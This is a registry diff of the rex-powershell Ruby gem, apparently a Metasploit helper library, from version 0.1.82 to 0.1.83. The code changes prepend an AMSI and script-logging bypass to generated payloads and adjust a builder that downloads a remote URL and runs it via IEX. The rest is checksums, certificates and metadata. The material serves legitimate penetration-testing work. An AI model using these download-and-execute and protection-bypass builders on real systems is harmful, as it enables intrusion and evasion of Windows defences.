rex-powershell 0.1.82 → 0.1.83
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +5 -5
- checksums.yaml.gz.sig +0 -0
- data.tar.gz.sig +0 -0
- data/lib/rex/powershell/command.rb +7 -3
- data/lib/rex/powershell/psh_methods.rb +17 -3
- data/lib/rex/powershell/version.rb +1 -1
- metadata +79 -74
- metadata.gz.sig +0 -0
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
|
-
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
2
|
+
SHA256:
|
|
3
|
+
metadata.gz: 421ac28e512865c91044739b0da3ab0760e80c4f4df966cbf39a935c1d083f3c
|
|
4
|
+
data.tar.gz: d5e958eaa5539f183d67543b3feaa4b9f489f2868882032cb43d6d9f30f82668
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: a545a48c3e0515cd897155304736db6749877453abc5fc07e9c3e7cc84ef6417e5bda0a2523ec0e43dc9ff93dc40fecb31f004f5a84bfca75e6cb7b34f8f5946
|
|
7
|
+
data.tar.gz: 4c1ae7b605031e7cbe433b62a1a916d5bdef4322910035929baa3982de6a247a1133e11a747cf06dd35f110ed752fa62150199885afa1318c59efc30c2c5cfea
|
checksums.yaml.gz.sig
CHANGED
|
Binary file
|
data.tar.gz.sig
CHANGED
|
Binary file
|
|
@@ -316,11 +316,13 @@ EOS
|
|
|
316
316
|
end
|
|
317
317
|
end
|
|
318
318
|
|
|
319
|
+
compressed_payload = compress_script(psh_payload, nil, opts)
|
|
320
|
+
|
|
319
321
|
if opts[:prepend_protections_bypass]
|
|
320
|
-
|
|
322
|
+
bypass_amsi = Rex::Powershell::PshMethods.bypass_powershell_protections
|
|
323
|
+
compressed_payload = bypass_amsi + ";" + compressed_payload
|
|
321
324
|
end
|
|
322
325
|
|
|
323
|
-
compressed_payload = compress_script(psh_payload, nil, opts)
|
|
324
326
|
encoded_payload = encode_script(psh_payload, opts)
|
|
325
327
|
|
|
326
328
|
# This branch is probably never taken...
|
|
@@ -372,7 +374,9 @@ EOS
|
|
|
372
374
|
end
|
|
373
375
|
psh_command = generate_psh_command_line(command_args)
|
|
374
376
|
|
|
375
|
-
if opts[:
|
|
377
|
+
if opts[:exec_in_place] and (not opts[:encode_final_payload] and not opts[:encode_inner_payload])
|
|
378
|
+
command = final_payload
|
|
379
|
+
elsif opts[:remove_comspec]
|
|
376
380
|
command = psh_command
|
|
377
381
|
else
|
|
378
382
|
command = "%COMSPEC% /b /c start /b /min #{psh_command}"
|
|
@@ -124,12 +124,12 @@ module Powershell
|
|
|
124
124
|
#
|
|
125
125
|
# @return [String] PowerShell code to disable PowerShell Built-In Protections
|
|
126
126
|
def self.bypass_powershell_protections()
|
|
127
|
-
%Q{
|
|
127
|
+
uglify_ps(%Q{
|
|
128
128
|
If($PSVersionTable.PSVersion.Major -ge 3){
|
|
129
129
|
#{self.bypass_script_log}
|
|
130
130
|
#{self.bypass_amsi}
|
|
131
131
|
}
|
|
132
|
-
}
|
|
132
|
+
})
|
|
133
133
|
end
|
|
134
134
|
|
|
135
135
|
#
|
|
@@ -147,6 +147,14 @@ module Powershell
|
|
|
147
147
|
end
|
|
148
148
|
end
|
|
149
149
|
|
|
150
|
+
#
|
|
151
|
+
# Force use of TLS1.2
|
|
152
|
+
#
|
|
153
|
+
# @ return [String] Powershell code to force use of TLS1.2
|
|
154
|
+
def self.force_tls12()
|
|
155
|
+
%Q^[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;^
|
|
156
|
+
end
|
|
157
|
+
|
|
150
158
|
#
|
|
151
159
|
# Use the default system web proxy and credentials to download a URL
|
|
152
160
|
# as a string and execute the contents as PowerShell
|
|
@@ -158,15 +166,21 @@ module Powershell
|
|
|
158
166
|
def self.proxy_aware_download_and_exec_string(url, iex = true)
|
|
159
167
|
var = Rex::Text.rand_text_alpha(1)
|
|
160
168
|
cmd = "$#{var}=new-object net.webclient;"
|
|
169
|
+
cmd << "if([System.Net.WebProxy]::GetDefaultProxy().address -ne $null){"
|
|
161
170
|
cmd << "$#{var}.proxy=[Net.WebRequest]::GetSystemWebProxy();"
|
|
162
171
|
cmd << "$#{var}.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
|
|
172
|
+
cmd << "};"
|
|
163
173
|
if iex
|
|
164
|
-
cmd << "IEX $#{var}.
|
|
174
|
+
cmd << "IEX ([System.Text.Encoding]::ASCII.GetString($#{var}.downloaddata('#{url}')));"
|
|
165
175
|
else
|
|
166
176
|
cmd << "&([scriptblock]::create($#{var}.downloadstring('#{url}'));"
|
|
167
177
|
end
|
|
168
178
|
cmd
|
|
169
179
|
end
|
|
180
|
+
|
|
181
|
+
def self.uglify_ps(script)
|
|
182
|
+
return script.gsub(/\ +/, " ").gsub(/\n+/, '')
|
|
183
|
+
end
|
|
170
184
|
end
|
|
171
185
|
end
|
|
172
186
|
end
|
metadata
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: rex-powershell
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version: 0.1.
|
|
4
|
+
version: 0.1.83
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
7
|
- David 'thelightcosine' Maloney
|
|
@@ -10,85 +10,90 @@ bindir: exe
|
|
|
10
10
|
cert_chain:
|
|
11
11
|
- |
|
|
12
12
|
-----BEGIN CERTIFICATE-----
|
|
13
|
-
|
|
14
|
-
|
|
15
|
-
|
|
16
|
-
|
|
17
|
-
|
|
18
|
-
|
|
19
|
-
|
|
20
|
-
|
|
21
|
-
|
|
22
|
-
|
|
23
|
-
|
|
24
|
-
|
|
25
|
-
|
|
26
|
-
|
|
27
|
-
|
|
28
|
-
|
|
29
|
-
|
|
30
|
-
|
|
31
|
-
|
|
13
|
+
MIIDtzCCAp+gAwIBAgIQDOfg5RfYRv6P5WD8G/AwOTANBgkqhkiG9w0BAQUFADBl
|
|
14
|
+
MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
|
|
15
|
+
d3cuZGlnaWNlcnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJv
|
|
16
|
+
b3QgQ0EwHhcNMDYxMTEwMDAwMDAwWhcNMzExMTEwMDAwMDAwWjBlMQswCQYDVQQG
|
|
17
|
+
EwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNl
|
|
18
|
+
cnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJvb3QgQ0EwggEi
|
|
19
|
+
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCtDhXO5EOAXLGH87dg+XESpa7c
|
|
20
|
+
JpSIqvTO9SA5KFhgDPiA2qkVlTJhPLWxKISKityfCgyDF3qPkKyK53lTXDGEKvYP
|
|
21
|
+
mDI2dsze3Tyoou9q+yHyUmHfnyDXH+Kx2f4YZNISW1/5WBg1vEfNoTb5a3/UsDg+
|
|
22
|
+
wRvDjDPZ2C8Y/igPs6eD1sNuRMBhNZYW/lmci3Zt1/GiSw0r/wty2p5g0I6QNcZ4
|
|
23
|
+
VYcgoc/lbQrISXwxmDNsIumH0DJaoroTghHtORedmTpyoeb6pNnVFzF1roV9Iq4/
|
|
24
|
+
AUaG9ih5yLHa5FcXxH4cDrC0kqZWs72yl+2qp/C3xag/lRbQ/6GW6whfGHdPAgMB
|
|
25
|
+
AAGjYzBhMA4GA1UdDwEB/wQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQW
|
|
26
|
+
BBRF66Kv9JLLgjEtUYunpyGd823IDzAfBgNVHSMEGDAWgBRF66Kv9JLLgjEtUYun
|
|
27
|
+
pyGd823IDzANBgkqhkiG9w0BAQUFAAOCAQEAog683+Lt8ONyc3pklL/3cmbYMuRC
|
|
28
|
+
dWKuh+vy1dneVrOfzM4UKLkNl2BcEkxY5NM9g0lFWJc1aRqoR+pWxnmrEthngYTf
|
|
29
|
+
fwk8lOa4JiwgvT2zKIn3X/8i4peEH+ll74fg38FnSbNd67IJKusm7Xi+fT8r87cm
|
|
30
|
+
NW1fiQG2SVufAQWbqz0lwcy2f8Lxb4bG+mRo64EtlOtCt/qMHt1i8b5QZ7dsvfPx
|
|
31
|
+
H2sMNgcWfzd8qVttevESRmCD1ycEvkvOl77DZypoEd+A5wwzZr8TDRRu838fYxAe
|
|
32
|
+
+o0bJW1sj6W3YQGx0qMmoRBxna3iw/nDmVG3KwcIzi7mULKn+gpFL6Lw8g==
|
|
32
33
|
-----END CERTIFICATE-----
|
|
33
34
|
- |
|
|
34
35
|
-----BEGIN CERTIFICATE-----
|
|
35
|
-
|
|
36
|
-
|
|
37
|
-
|
|
38
|
-
|
|
39
|
-
|
|
40
|
-
|
|
41
|
-
|
|
42
|
-
|
|
43
|
-
|
|
44
|
-
|
|
45
|
-
|
|
46
|
-
|
|
47
|
-
|
|
48
|
-
|
|
49
|
-
|
|
50
|
-
|
|
51
|
-
|
|
52
|
-
|
|
53
|
-
|
|
54
|
-
|
|
55
|
-
|
|
56
|
-
|
|
57
|
-
|
|
58
|
-
|
|
59
|
-
|
|
36
|
+
MIIFMDCCBBigAwIBAgIQBAkYG1/Vu2Z1U0O1b5VQCDANBgkqhkiG9w0BAQsFADBl
|
|
37
|
+
MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
|
|
38
|
+
d3cuZGlnaWNlcnQuY29tMSQwIgYDVQQDExtEaWdpQ2VydCBBc3N1cmVkIElEIFJv
|
|
39
|
+
b3QgQ0EwHhcNMTMxMDIyMTIwMDAwWhcNMjgxMDIyMTIwMDAwWjByMQswCQYDVQQG
|
|
40
|
+
EwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3d3cuZGlnaWNl
|
|
41
|
+
cnQuY29tMTEwLwYDVQQDEyhEaWdpQ2VydCBTSEEyIEFzc3VyZWQgSUQgQ29kZSBT
|
|
42
|
+
aWduaW5nIENBMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA+NOzHH8O
|
|
43
|
+
Ea9ndwfTCzFJGc/Q+0WZsTrbRPV/5aid2zLXcep2nQUut4/6kkPApfmJ1DcZ17aq
|
|
44
|
+
8JyGpdglrA55KDp+6dFn08b7KSfH03sjlOSRI5aQd4L5oYQjZhJUM1B0sSgmuyRp
|
|
45
|
+
wsJS8hRniolF1C2ho+mILCCVrhxKhwjfDPXiTWAYvqrEsq5wMWYzcT6scKKrzn/p
|
|
46
|
+
fMuSoeU7MRzP6vIK5Fe7SrXpdOYr/mzLfnQ5Ng2Q7+S1TqSp6moKq4TzrGdOtcT3
|
|
47
|
+
jNEgJSPrCGQ+UpbB8g8S9MWOD8Gi6CxR93O8vYWxYoNzQYIH5DiLanMg0A9kczye
|
|
48
|
+
n6Yzqf0Z3yWT0QIDAQABo4IBzTCCAckwEgYDVR0TAQH/BAgwBgEB/wIBADAOBgNV
|
|
49
|
+
HQ8BAf8EBAMCAYYwEwYDVR0lBAwwCgYIKwYBBQUHAwMweQYIKwYBBQUHAQEEbTBr
|
|
50
|
+
MCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5kaWdpY2VydC5jb20wQwYIKwYBBQUH
|
|
51
|
+
MAKGN2h0dHA6Ly9jYWNlcnRzLmRpZ2ljZXJ0LmNvbS9EaWdpQ2VydEFzc3VyZWRJ
|
|
52
|
+
RFJvb3RDQS5jcnQwgYEGA1UdHwR6MHgwOqA4oDaGNGh0dHA6Ly9jcmw0LmRpZ2lj
|
|
53
|
+
ZXJ0LmNvbS9EaWdpQ2VydEFzc3VyZWRJRFJvb3RDQS5jcmwwOqA4oDaGNGh0dHA6
|
|
54
|
+
Ly9jcmwzLmRpZ2ljZXJ0LmNvbS9EaWdpQ2VydEFzc3VyZWRJRFJvb3RDQS5jcmww
|
|
55
|
+
TwYDVR0gBEgwRjA4BgpghkgBhv1sAAIEMCowKAYIKwYBBQUHAgEWHGh0dHBzOi8v
|
|
56
|
+
d3d3LmRpZ2ljZXJ0LmNvbS9DUFMwCgYIYIZIAYb9bAMwHQYDVR0OBBYEFFrEuXsq
|
|
57
|
+
CqOl6nEDwGD5LfZldQ5YMB8GA1UdIwQYMBaAFEXroq/0ksuCMS1Ri6enIZ3zbcgP
|
|
58
|
+
MA0GCSqGSIb3DQEBCwUAA4IBAQA+7A1aJLPzItEVyCx8JSl2qB1dHC06GsTvMGHX
|
|
59
|
+
fgtg/cM9D8Svi/3vKt8gVTew4fbRknUPUbRupY5a4l4kgU4QpO4/cY5jDhNLrddf
|
|
60
|
+
RHnzNhQGivecRk5c/5CxGwcOkRX7uq+1UcKNJK4kxscnKqEpKBo6cSgCPC6Ro8Al
|
|
61
|
+
EeKcFEehemhor5unXCBc2XGxDI+7qPjFEmifz0DLQESlE/DmZAwlCEIysjaKJAL+
|
|
62
|
+
L3J+HNdJRZboWR3p+nRka7LrZkPas7CM1ekN3fYBIM6ZMWM9CBoYs4GbT8aTEAb8
|
|
63
|
+
B4H6i9r5gkn3Ym6hU/oSlBiFLpKR6mhsRDKyZqHnGKSaZFHv
|
|
60
64
|
-----END CERTIFICATE-----
|
|
61
65
|
- |
|
|
62
66
|
-----BEGIN CERTIFICATE-----
|
|
63
|
-
|
|
64
|
-
|
|
65
|
-
|
|
66
|
-
|
|
67
|
-
|
|
68
|
-
|
|
69
|
-
|
|
70
|
-
|
|
71
|
-
|
|
72
|
-
|
|
73
|
-
|
|
74
|
-
|
|
75
|
-
|
|
76
|
-
|
|
77
|
-
|
|
78
|
-
|
|
79
|
-
|
|
80
|
-
|
|
81
|
-
|
|
82
|
-
|
|
83
|
-
|
|
84
|
-
|
|
85
|
-
|
|
86
|
-
|
|
87
|
-
|
|
88
|
-
|
|
89
|
-
|
|
67
|
+
MIIFIzCCBAugAwIBAgIQDX9ZkVJ2eNVTlibR5ALyJTANBgkqhkiG9w0BAQsFADBy
|
|
68
|
+
MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
|
|
69
|
+
d3cuZGlnaWNlcnQuY29tMTEwLwYDVQQDEyhEaWdpQ2VydCBTSEEyIEFzc3VyZWQg
|
|
70
|
+
SUQgQ29kZSBTaWduaW5nIENBMB4XDTE5MTAxNjAwMDAwMFoXDTIwMTAxOTEyMDAw
|
|
71
|
+
MFowYDELMAkGA1UEBhMCVVMxFjAUBgNVBAgTDU1hc3NhY2h1c2V0dHMxDzANBgNV
|
|
72
|
+
BAcTBkJvc3RvbjETMBEGA1UEChMKUmFwaWQ3IExMQzETMBEGA1UEAxMKUmFwaWQ3
|
|
73
|
+
IExMQzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBANHnKegPAghKuZk4
|
|
74
|
+
Gy1jKaZEXbWc4fxioTemv/F1yIYzAjCWP65qjKtyeeFDe4/kJzG9nseF9oa93YBf
|
|
75
|
+
1nyEqxNSZMw/sCAZ87lOl713dRi73uxOoszy2PT5xEB+Q5R6cbzExkWG2zrLdXDr
|
|
76
|
+
so0Bd6VHw+IsAoBBkAq5FrZOJQYGn5VY20xw/2DqtCeoW4QDWyqTnbJmwO9tZrfr
|
|
77
|
+
3Le2crfk2eOgafaPNhLon5uuIKCZsk2YkUSNURSS3M7gosMwU9Gg4JTBi7X5+oww
|
|
78
|
+
rY43dJT28YklxmNVu8o5kJxW4dqLKJLOIgSXZ63nceT/EaCSg7DcofHNcUzejFwb
|
|
79
|
+
M7Zbb2kCAwEAAaOCAcUwggHBMB8GA1UdIwQYMBaAFFrEuXsqCqOl6nEDwGD5LfZl
|
|
80
|
+
dQ5YMB0GA1UdDgQWBBR18CAeMsIEU+0pXal/XXw9LCtMADAOBgNVHQ8BAf8EBAMC
|
|
81
|
+
B4AwEwYDVR0lBAwwCgYIKwYBBQUHAwMwdwYDVR0fBHAwbjA1oDOgMYYvaHR0cDov
|
|
82
|
+
L2NybDMuZGlnaWNlcnQuY29tL3NoYTItYXNzdXJlZC1jcy1nMS5jcmwwNaAzoDGG
|
|
83
|
+
L2h0dHA6Ly9jcmw0LmRpZ2ljZXJ0LmNvbS9zaGEyLWFzc3VyZWQtY3MtZzEuY3Js
|
|
84
|
+
MEwGA1UdIARFMEMwNwYJYIZIAYb9bAMBMCowKAYIKwYBBQUHAgEWHGh0dHBzOi8v
|
|
85
|
+
d3d3LmRpZ2ljZXJ0LmNvbS9DUFMwCAYGZ4EMAQQBMIGEBggrBgEFBQcBAQR4MHYw
|
|
86
|
+
JAYIKwYBBQUHMAGGGGh0dHA6Ly9vY3NwLmRpZ2ljZXJ0LmNvbTBOBggrBgEFBQcw
|
|
87
|
+
AoZCaHR0cDovL2NhY2VydHMuZGlnaWNlcnQuY29tL0RpZ2lDZXJ0U0hBMkFzc3Vy
|
|
88
|
+
ZWRJRENvZGVTaWduaW5nQ0EuY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQEL
|
|
89
|
+
BQADggEBAFpzR9s7lcYKDzSJucOHztEPj+iSIeCzxEw34NTE9M2AfkYIu82c4r2a
|
|
90
|
+
bzIGmzZWiCGufjOp0gF5xW6sSSJ9n0TqH0nhHhvjtZQkmkGtOBbN1zeYDFS2ozAp
|
|
91
|
+
sljF/g68Y1eYs3NaFf7kQUa6vb6RdjW3J8M9AQ8gthBt7gr/guVxd/gJUYbdDdBX
|
|
92
|
+
cWfJJi/X7GVBOBmmvA43qoKideuhOBrVGBHvIF/yO9p23dIiUrGmW9kxXCSxgute
|
|
93
|
+
JI/W23RbIRksG2pioMhd4dCXq3FLLlkOV1YfCwWixNB+iIhQPPZVaPNfgPhCn4Dt
|
|
94
|
+
DeGjje/qA4fkLtRmOtb9PUBq3ToRDE4=
|
|
90
95
|
-----END CERTIFICATE-----
|
|
91
|
-
date: 2019-
|
|
96
|
+
date: 2019-11-18 00:00:00.000000000 Z
|
|
92
97
|
dependencies:
|
|
93
98
|
- !ruby/object:Gem::Dependency
|
|
94
99
|
name: bundler
|
|
@@ -212,7 +217,7 @@ required_rubygems_version: !ruby/object:Gem::Requirement
|
|
|
212
217
|
version: '0'
|
|
213
218
|
requirements: []
|
|
214
219
|
rubyforge_project:
|
|
215
|
-
rubygems_version: 2.
|
|
220
|
+
rubygems_version: 2.7.10
|
|
216
221
|
signing_key:
|
|
217
222
|
specification_version: 4
|
|
218
223
|
summary: Rex Powershell Utilities
|
metadata.gz.sig
CHANGED
|
Binary file
|